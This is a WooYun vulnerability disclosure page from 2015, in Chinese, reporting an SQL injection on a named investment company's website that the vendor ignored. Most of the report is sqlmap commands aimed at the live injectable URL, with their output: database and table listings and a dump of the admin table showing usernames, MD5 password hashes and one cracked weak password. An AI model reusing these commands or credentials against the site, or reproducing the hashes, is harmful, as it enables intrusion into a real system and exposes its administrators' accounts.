当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098461

漏洞标题:剑平国际投资公司SQL注入漏洞(存在弱口令)

相关厂商:剑平国际投资公司

漏洞作者: 明月影

提交时间:2015-02-27 11:39

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

主站某处sql注入

详细说明:

注入点:http://www.jpi.cn/show.php?id=182&channel=2&class=30


available databases [3]:
[*] information_schema
[*] test
[*] xr7igl
Database: xr7igl
[44 tables]
+---------------------+
| admin |
| admin_group |
| advert |
| advert_words |
| article |
| article_add |
| channel |
| class |
| class_link |
| corpinfo |
| e_article |
| e_article_add |
| e_zp_article |
| e_zp_article_add |
| frindlink |
| member |
| member_class |
| member_complaints |
| member_consume |
| member_group |
| member_guestbook |
| member_subscription |
| mode |
| mode_custom_search |
| mode_fields |
| mykeys |
| pic_article_add |
| plugs |
| pro |
| pro_add |
| rjxz |
| rjxz_add |
| shop_address |
| shop_car |
| shop_car_order |
| shop_send |
| sortup |
| swm_fields |
| swm_tables |
| topic |
| topic_list |
| travel_apply |
| zp_article |
| zp_article_add |
+---------------------+
sqlmap.py -u "http://www.jpi.cn/show.php?id=182&channel=2&class=30" --dbms mysql -D xr7igl -T admin --columns
Database: xr7igl
Table: admin
[9 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| aid | char(20) |
| channels | varchar(30) |
| crew | varchar(255) |
| groupid | smallint(5) |
| id | int(5) |
| logincount | int(10) unsigned |
| logindate | datetime |
| modes | varchar(255) |
| pwd | char(32) |
+------------+------------------+
Database: xr7igl
Table: admin_group
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(5) |
| purviews | text |
| title | varchar(50) |
+----------+-------------+
sqlmap.py -u "http://www.jpi.cn/show.php?id=182&channel=2&class=30" --dbms mysql -D xr7igl -T admin -C id,aid,logincount,pwd --dump
Database: xr7igl
Table: admin
[3 entries]
+----+-------+------------+-------------------------------------------+
| id | aid | logincount | pwd |
+----+-------+------------+-------------------------------------------+
| 1 | admin | 285 | d05056f0f8ee664ca41c2dfa0f6e5954 |
| 3 | root | 23 | e10adc3949ba59abbe56e057f20f883e (123456) |
| 4 | yewu | 13 | 0d0d4c4c20a8c8dd15040953a14ef12a |
+----+-------+------------+-------------------------------------------+
防火墙没有,过滤也不可靠。
还有弱口令。

漏洞证明:

+----+-------+------------+-------------------------------------------+
| id | aid | logincount | pwd |
+----+-------+------------+-------------------------------------------+
| 1 | admin | 285 | d05056f0f8ee664ca41c2dfa0f6e5954 |
| 3 | root | 23 | e10adc3949ba59abbe56e057f20f883e (123456) |
| 4 | yewu | 13 | 0d0d4c4c20a8c8dd15040953a14ef12a |
+----+-------+------------+-------------------------------------------+

修复方案:

治疗漏洞问题,你们更专业。

版权声明:转载请注明来源 明月影@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝